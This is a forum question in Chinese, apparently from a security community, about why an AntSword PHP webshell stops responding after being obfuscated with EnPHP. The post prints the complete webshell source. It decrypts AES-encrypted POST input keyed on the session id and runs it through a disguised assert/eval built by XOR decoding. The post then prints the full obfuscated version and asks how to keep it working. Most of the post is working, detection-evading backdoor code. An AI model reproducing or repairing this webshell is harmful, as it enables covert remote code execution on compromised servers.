关于antsword中php混淆部分,enphp混淆过的代码无法正常响应

师傅您好,在看完师傅的php_webshell免杀--从0改造你的AntSword这篇文章之后,我尝试将师傅的webshell放到enphp进行混淆
webshell:

<?php
@session_start();
error_reporting(E_ALL^E_NOTICE^E_WARNING);
function decode($key,$data){
$data_new = '';
for($i=0;$i<=strlen($data);$i++){
$b=$data[$i]^$key;
$data_new = $data_new.urldecode($b);
}
define('ass',$data_new[0].strrev($data_new)[2].strrev($data_new)[2].$data_new[11].strrev($data_new)[4].strrev($data_new)[0]);
define('ev',$data_new[11].strrev($data_new)[8].$data_new[0].strrev($data_new)[6].'($result)');
return $data_new;
}
function decrypto($key,$data){
$data = base64_decode($data);
$result = openssl_decrypt($data, 'AES-128-ECB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);
decode('\\','=:=om>n?o8h9i:j;k*d0e.l/m(');
$ass=ass;
$ass(ev);
}
class run{
    public $data;
    public function __construct(){
$this->data = '#````````#'.$_POST[1]."#`#`#";
$this->data = $this->data."123456";
}
}
$key=@substr(str_pad(session_id(),16,'a'),0,16);
$run = new run();
decrypto($key,$run->data);
?>

enphp选项

image.png
得到如下php代码

<?php
/*
-- EnPHP v2: http://enphp.djunny.com/
*/goto ÁǶ;äõª:ð¬§(0x0278d)(E_ALL^E_NOTICE^E_WARNING);goto ¥¢àó;×ïè:function £‰‹¨(){goto έâ—;ö료:if(!($¹·ß¤[0x001]==$©ÞÚñ+0x00093))goto öûÈŒ;goto ËËÔ°;¼´ž¦:if(!($¹·ß¤[0x001]==$©ÞÚñ+0x0000bc))goto …Æ;goto °­«°;µ¤úÜ:if(!($¹·ß¤[0x001]==$©ÞÚñ+0x0065))goto  «ƒ‰;goto ÈúÆ¿;ê¶¶£: «ƒ‰:goto ö료;‰þÄ :return(base64_decode('XA')?:$óó™¤);goto ꎼô;¶Ë°ä:if(!($¹·ß¤[0x0002]==$©ÞÚñ+0x000017))goto ™Ëƒý;goto ‰þÄ ;‘œï’:É•“:goto ቡ ;˜–â¦:¼øÝÎ:goto Ë‹´Ø;ËËÔ°:return base64_decode(str_rot13('V2OtLTOtLTOtVj'));goto «ªÆ;°­«°:return(base64_decode('I2AjYCM')?:$ª×ù);goto üùä;Ë‹´Ø:if(!($¹·ß¤[0x0002]==$©ÞÚñ+0x0012d))goto É•“;goto ‚œŸ¢;έâ—:$¹·ß¤=func_get_args();goto Ûðª×;ꎼô:™Ëƒý:goto µ¤úÜ;‚œŸ¢:return "\x73\x75\142\x73\164\x72";goto ‘œï’;ÈúÆ¿:return(base64_decode('PTo9b20+bj9vOGg5aTpqO2sqZDBlLmwvbSg')?:$ÍãÉÒ);goto ê¶¶£;üùä:…Æ:goto –ÏÓ£;–ÏÓ£:if(!($¹·ß¤[0x001]==$©ÞÚñ+0x0f5))goto ¼øÝÎ;goto ŒÓÓ¹;ŒÓÓ¹:return(base64_decode('MTIzNDU2')?:‹†‘);goto ˜–â¦;«ªÆ:öûÈŒ:goto ¼´ž¦;Ûðª×:$©ÞÚñ=0x00c18;goto ¶Ë°ä;ቡ :}goto 󶆈;Œƒ˜»:function ÓÊû¯(){goto àê©¶;°þ¢ç:if(!($•‡¦Þ[0x001]==$ìî¿+0x0029))goto ŒÏÉç;goto –ôìø;ÕÔÙÏ:return "\x61";goto ¤å¿Â;Õ‡º¨:$ìî¿=0x0171b;goto °þ¢ç;–ôìø:return "\x73\145\x73\x73\151\157\x6e\137\x69\x64";goto ´´¢È;¤å¿Â:ªç·:goto ™¾¢;àê©¶:$•‡¦Þ=func_get_args();goto Õ‡º¨;´´¢È:ŒÏÉç:goto Öó¹Õ;Öó¹Õ:if(!($•‡¦Þ[0x001]==$ìî¿+0x000076))goto ªç·;goto ÕÔÙÏ;™¾¢:}goto ×ïè;¥¢àó:function decode($ýðûÃ,$ÑÓˆ©){goto ¶‰Û;ÐÌá:goto Æì”â;goto ·ÅëÜ;ââ£ñ:$–ƒÇô=$–ƒÇô.ð¬§(0x0000027dc,0x0000027eb,0x000027bd)($†¿Ñ);goto çµí»;ý¾Šá:$ Ù®›=0;goto Ü™²Š;¬Ÿ¹ã:$†¿Ñ=$ÑÓˆ©[$ Ù®›]^$ýðûÃ;goto ââ£ñ;œ£éœ:$ Ù®›++;goto ÐÌá;·ÅëÜ:áïþÎ:goto ‹¸Œ¦;Ü™²Š:Æì”â:goto ¤Ïä°;∜ì:return $–ƒÇô;goto »Í ;ù§â×:define(²šÅ±(0x00001237),$–ƒÇô[0x00b].strrev($–ƒÇô)[0x00008].$–ƒÇô[0].²šÅ±(0x00011eb,0x01211,0x000011dd)($–ƒÇô)[0x006].²šÅ±(0x00001282,0x0012b2,0x0001263,$–ƒÇô));goto ∜ì;‹¸Œ¦:ð¬§(0x027fb)(²šÅ±(0x011bc,0x0000011ca,0x011a3),$–ƒÇô[0].²šÅ±(0x00011eb,0x01211,0x000011dd)($–ƒÇô)[0x0002].²šÅ±(0x00011eb,0x01211,0x000011dd)($–ƒÇô)[0x0002].$–ƒÇô[0x00b].²šÅ±(0x00011eb,0x01211,0x000011dd)($–ƒÇô)[0x000004].²šÅ±(0x00011eb,0x01211,0x000011dd)($–ƒÇô)[0]);goto ù§â×;çµí»:®òÒª:goto œ£éœ;¶‰Û:$–ƒÇô=((parse_str("¨½–¨=",“ƒ“)||“ƒ“)?base64_decode(“ƒ“['¨½–¨']):"");goto ý¾Šá;¤Ïä°:if(!($ Ù®›<=strlen($ÑÓˆ©)))goto áïþÎ;goto ¬Ÿ¹ã;»Í :}goto ¼Ôîå;󶆈:function ²šÅ±(){goto ã¥Ò;¼Õ™†:return((parse_str("“öÅÝ=KCRyZXN1bHQp",…š£)||…š£)?base64_decode(…š£['“öÅÝ']):"");goto ªÎñù;æ¿ïÁ:ÏÄÍÏ:goto …·Í†;ÚÍ·Ä:»ä¥‚:goto ÷—ãÝ;„ň˜:…ÀÛÈ:goto Û”øæ;¶ä´Â:return((parse_str("YmFzZTY0X2RlY29kZQ",$¶Î͘)||$¶Î͘)?base64_decode(key($¶Î͘)):"");goto „ň˜;Ÿ®ë:if(!($°ãî¸[0x0002]==$ƒö”Ÿ+0x0000df))goto ߺ²·;goto ¼Õ™†;®Á¡:if(!($°ãî¸[0x0002]==$ƒö”Ÿ+0x001f))goto »ä¥‚;goto ‹ªÏä;¡½Äð:±éæã:goto °ÓŽ;ëØè²:return base64_decode('ZXY');goto äåµÃ;Àªû :return base64_decode(join("",array('Q','U','V','T','L','T','E','y','O','C','1','F','Q','0','I')));goto ¡½Äð;‹ªÏä:return(($¸Óç=gzinflate(substr(base64_decode('H4sIAAAAAAAAA0ssLgYAtnJKewMAAAA'),10,-8)))?$¸Óç:’‹ø);goto ÚÍ·Ä;÷—ãÝ:if(!($°ãî¸[0x0002]==$ƒö”Ÿ+0x0000059))goto ÏÄÍÏ;goto âç®ä;ªÎñù:ߺ²·:goto ˜íº‡;âç®ä:return((parse_str("òÙš©=c3RycmV2",$˜ãÙ­)||$˜ãÙ­)?base64_decode($˜ãÙ­['òÙš©']):"");goto æ¿ïÁ;Û”øæ:if(!($°ãî¸[0x001]==$ƒö”Ÿ+0x000001a3))goto ±éæã;goto Àªû ;˜íº‡:if(!($°ãî¸[0x0002]==$ƒö”Ÿ+0x0000148))goto …ÀÛÈ;goto ¶ä´Â;ã¥Ò:$ƒö”Ÿ=0x000001184;goto §ÊÛ“;äåµÃ:ö³×Ï:goto Ÿ®ë;§ÊÛ“:$°ãî¸=func_get_args();goto ®Á¡;…·Í†:if(!($°ãî¸[0]==$ƒö”Ÿ+0x00000b3))goto ö³×Ï;goto ëØè²;°ÓŽ:}goto ñàÌ’;¼Ôîå:function decrypto($ýðûÃ,$ÑÓˆ©){goto ¯ˆáð;·²Ñ·:decode(£‰‹¨(0x0c4e,0x0000c6a,0x00000c2f),£‰‹¨(0x0000c92,0x000c7d));goto Ö…ç¯;ÍéÓ:$àð(ev);goto ßêè;Ö…ç¯:$àð=ass;goto ÍéÓ;‘þ¸:$é¾¾æ=openssl_decrypt($ÑÓˆ©,²šÅ±(0x00134d,0x00001327),$ýðûÃ,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);goto ·²Ñ·;¯ˆáð:$ÑÓˆ©=²šÅ±(0x012e3,0x0001303,0x00012cc)($ÑÓˆ©);goto ‘þ¸;ßêè:}goto äöø¨;ñàÌ’:function ð¬§(){goto ɤ¬Æ;Ú¿ññ:return(($“œžÏ=gzinflate(substr(base64_decode('H4sIAAAAAAAAA0stKsovii9KLcgvKsnMSwcAF20hmA8AAAA'),10,-8)))?$“œžÏ:–ÐØ);goto á‚™;£äå–:if(!($„[0x0002]==$óÌöÚ+0x0af))goto ýšë»;goto µÙÊ ;ç½â:Ù¦þÍ:goto …¬‰;¨±Ñ:return((parse_str("c2Vzc2lvbl9zdGFydA",$ÖýŽ)||$ÖýŽ)?base64_decode(key($ÖýŽ)):"");goto ç½â;ɤ¬Æ:$„=func_get_args();goto ·¢Ð;µÙÊ :return(($ññ¤Æ=gzinflate(substr(base64_decode('H4sIAAAAAAAAAystyklJTc5PSQUAvXi4agkAAAA'),10,-8)))?$ññ¤Æ:$„¶…‰);goto ·ÜˆÌ;ŠÚÎä:šíŸ„:goto ’½Äð;˜„܇:if(!($„[0x0002]==$óÌöÚ+0x001f))goto Ù¦þÍ;goto ¨±Ñ;Õµ—:if(!($„[0]==$óÌöÚ+0x000ed))goto šíŸ„;goto ƒ¥Ýò;…¬‰:if(!($„[0]==$óÌöÚ+0x0007f))goto ñ‰Ûè;goto Ú¿ññ;·ÜˆÌ:ýšë»:goto Õµ—;ƒ¥Ýò:return((parse_str("ã¶ê½=ZGVmaW5l",$£ñЩ)||$£ñЩ)?base64_decode($£ñЩ['ã¶ê½']):"");goto ŠÚÎä;á‚™:ñ‰Ûè:goto £äå–;·¢Ð:$óÌöÚ=0x0000270e;goto ˜„܇;’½Äð:}goto —¯;¦ÙØé:$ýðûÃ=@£‰‹¨(0x00d76,0x00000da1,0x000d45)(str_pad(ÓÊû¯(0x000001774,0x001744)(),0x0010,ÓÊû¯(0x000017b4,0x00001791)),0,0x0010);goto á„âó;äöø¨:class run{public $data;public function __construct(){$this->data=£‰‹¨(0x0cb7,0x0000cab).$_POST[0x001].£‰‹¨(0x0ce9,0x00000cd4);$this->data=$this->data.£‰‹¨(0x00000d2e,0x00d0d,$this);}}goto ¦ÙØé;—¯:@ð¬§(0x00002745,0x02760,0x00000272d)();goto äõª;á„âó:$¿·ï”=new run();goto îì“ô;ÁǶ:error_reporting(0);goto Œƒ˜»;îì“ô:decrypto($ýðûÃ,$¿·ï”->data);

image.png
通过蚁剑php aes加密无法正常响应(在混淆前正常),抓包显示如下

image.png
更换过几次enphp的选项,也试过不勾选所有选项,结果同上。想请教下师傅在enphp的混淆方法是怎么选的呢,在我的本地每次生成都会产生乱码,而师傅文章中的没有。
如果师傅方便的话可以加个v沟通一下吗

请先 登录 后评论
站长统计